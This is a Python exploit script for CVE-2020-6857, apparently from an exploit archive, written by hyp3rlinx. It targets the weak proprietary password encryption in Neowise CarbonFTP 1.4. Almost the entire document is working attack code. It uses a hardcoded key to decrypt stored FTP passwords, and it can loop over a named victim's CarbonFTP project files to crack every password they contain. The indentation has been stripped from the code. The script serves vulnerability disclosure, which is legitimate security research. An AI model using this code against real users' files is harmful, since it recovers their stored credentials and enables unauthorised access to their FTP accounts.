# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
# Date: 2020-04-20
# Author: hyp3rlinx
# Vendor:
# CVE: CVE-2020-6857
import time, string, sys, argparse, os, codecs
#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version.
#This should be compatible for Python 2 and 3 versions now, tested successfully.
#Sample test password
#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947
key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program.
chunk_sz=5 #number of bytes we must decrypt the password by.
#Password is stored here:
#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP
#Neowise CarbonFTP v1.4
#Insecure Proprietary Password Encryption
#By John Page (aka hyp3rlinx)
#Apparition Security
#===================================================
def carbonftp_conf(conf_file):
p=""
pipe=-1
passwd=""
lst_of_passwds=[]
try:
for p in conf_file:
idx = p.find("Password=STRING|")
if idx != -1:
pipe = p.find("|")
if pipe != -1:
passwd = p[pipe + 2: -2]
print(" Password found: "+ passwd)
lst_of_passwds.append(passwd)
except Exception as e:
print(str(e))
return lst_of_passwds
def reorder(lst):
k=1
j=0
for n in range(len(lst)):
k+=1
j+=1
try:
tmp = lst[n+k]
a = lst[n+j]
lst[n+j] = tmp
lst[n+k] = a
except Exception as e:
pass
return ''.join(lst)
def dec2hex(dec):
tmp = str(hex(int(dec)))
return str(tmp[2:])
#Updated for Python version compatibility.
def hex2ascii(h):
h=h.strip()
passwd=""
try:
passwd = codecs.decode(h, "hex").decode("ascii")
except Exception as e:
print("[!] In hex2ascii(), not a valid hex string.")
exit()
return passwd
def chunk_passwd(passwd_lst):
lst = []
for passwd in passwd_lst:
while passwd:
lst.append(passwd[:chunk_sz])
passwd = passwd[chunk_sz:]
return lst
def strip_non_printable_char(str):
return ''.join([x for x in str if ord(x) > 31 or ord(x)==9])
cnt = 0
passwd_str=""
def deob(c):
global cnt, passwd_str
tmp=""
try:
tmp = int(c) - int(key, 16)
tmp = dec2hex(tmp)
except Exception as e:
print("[!] Not a valid CarbonFTP encrypted password.")
exit()
b=""
a=""
#Seems we can delete the second char as its most always junk.
if cnt!=1:
a = tmp[:2]
cnt+=1
else:
b = tmp[:4]
passwd_str += strip_non_printable_char(hex2ascii(a + b))
hex_passwd_lst = list(passwd_str)
return hex_passwd_lst
def no_unique_chars(lst):
c=0
k=1
j=0
for i in range(len(lst)):
k+=1
j+=1
try:
a = lst[i]
b = lst[i+1]
if a != b:
c+=1
elif c==0:
print("[!] Possible one char password?: " +str(lst[0]))
return lst[0]
except Exception as e:
pass
return False
def decryptor(result_lst):
global passwd_str, sz
print(" Decrypting ... \n")
for i in result_lst:
print("[-] "+i)
time.sleep(0.1)
lst = deob(i)
#Re-order chars to correct sequence using custom swap function (reorder).
reordered_pass = reorder(lst)
sz = len(reordered_pass)
#Flag possible single char password.
no_unique_chars(lst)
print("[+] PASSWORD LENGTH: " + str(sz))
if sz == 9:
return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " +
reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)
#Shorter passwords less then nine chars will have several candidates
#as they get padded with repeating chars so we return those.
passwd_str=""
return reordered_pass
def display_cracked_passwd(sz, passwd):
if sz==9:
print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
else:
print("[*] DECRYPTED PASSWORD: "+passwd + "\n")
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
return parser.parse_args()
def main(args):
global passwd_str, sz
victim=""
if args.user and args.encrypted_password:
print("[!] Supply a victims username -u or single encrypted password -p, not both.")
exit()
print("[+] Neowise CarbonFTP v1.4")
time.sleep(0.1)
print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
time.sleep(0.1)
print("[+] Version 2 Exploit fixed for Python 3 compatibility")
time.sleep(0.1)
print("[+] Discovered and cracked by hyp3rlinx")
time.sleep(0.1)
print("[+] ApparitionSec\n")
time.sleep(1)
#Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
if args.user:
victim = args.user
os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
dir_lst = os.listdir(".")
for c in dir_lst:
f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
#Get encrypted password from conf file
passwd_enc = carbonftp_conf(f)
#Break up into 5 byte chunks as processed by the proprietary decryption routine.
result_lst = chunk_passwd(passwd_enc)
#Decrypt the 5 byte chunks and reassemble to the cleartext password.
cracked_passwd = decryptor(result_lst)
#Print cracked password or candidates.
display_cracked_passwd(sz, cracked_passwd)
time.sleep(0.3)
passwd_str=""
f.close()
#Crack a single password -p flag.
if args.encrypted_password:
passwd_to_crack_lst = []
passwd_to_crack_lst.append(args.encrypted_password)
result = chunk_passwd(passwd_to_crack_lst)
#Print cracked password or candidates.
cracked_passwd = decryptor(result)
display_cracked_passwd(sz, cracked_passwd)
if __name__=="__main__":
parser = argparse.ArgumentParser()
if len(sys.argv)==1:
parser.print_help(sys.stderr)
exit()
main(parse_args())